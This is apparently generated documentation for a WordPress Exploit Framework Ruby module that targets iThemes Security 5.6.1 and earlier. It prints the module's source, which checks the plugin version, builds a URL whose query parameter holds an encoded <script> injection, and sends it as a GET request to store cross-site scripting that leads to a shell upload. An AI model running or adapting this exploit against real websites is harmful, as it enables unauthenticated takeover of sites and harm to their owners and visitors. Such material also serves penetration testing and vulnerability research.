class Wpxf::Exploit::IthemesSecurityStoredXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'iThemes Security <= 5.6.1 Unauthenticated Stored XSS Shell Upload', author: [ 'Slavco Mihajloski', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8635'], ['URL', 'https://medium.com/websec/xss-vulnerability-in-ithemes-security-formerly-better-wp-security-5-6-1-2fba71f96f5d#.116tc5aol'] ], date: 'Oct 06 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('better-wp-security', '5.6.2') end
expected_status_code_after_store()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 27 def expected_status_code_after_store 404 end
generate_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 31 def generate_url normalize_uri(full_uri, "/#{Utility::Text.rand_alphanumeric(rand(10..20))}") + "?#{Utility::Text.rand_alpha(rand(1..5))}=<script>#{xss_ascii_encoded_include_script}</script>" end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 35 def store_script execute_get_request( url: generate_url ) end